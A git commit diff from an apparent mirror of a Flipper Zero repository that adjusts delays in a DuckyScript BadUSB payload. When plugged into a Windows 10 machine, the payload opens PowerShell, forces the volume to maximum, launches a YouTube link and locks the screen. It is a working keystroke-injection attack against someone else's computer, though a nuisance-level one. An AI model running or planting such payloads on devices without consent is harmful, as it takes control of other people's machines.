mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 06:20:12 +00:00
commit
95f66a4a57
@ -3,17 +3,17 @@ REM Creator: Grim<3
|
|||||||
REM What this script does is open powershell runs a command that makes the targets volume to max locks the targets device and plays song or sound from a youtube link
|
REM What this script does is open powershell runs a command that makes the targets volume to max locks the targets device and plays song or sound from a youtube link
|
||||||
REM For: Win10 (will use default browser)
|
REM For: Win10 (will use default browser)
|
||||||
GUI R
|
GUI R
|
||||||
DELAY 100
|
DELAY 1000
|
||||||
STRING Powershell.exe
|
STRING Powershell.exe
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
DELAY 1000
|
||||||
STRING Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}}
|
STRING Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}}
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 100
|
DELAY 2000
|
||||||
STRING Set-Speaker -Volume 50
|
STRING Set-Speaker -Volume 50
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 100
|
DELAY 2000
|
||||||
STRING start YOUR YOUTUBE LINK WITH THE HTTPS://
|
STRING start YOUR YOUTUBE LINK WITH THE HTTPS://
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 100
|
DELAY 4000
|
||||||
GUI L
|
GUI L
|
||||||
|
Loading…
Reference in New Issue
Block a user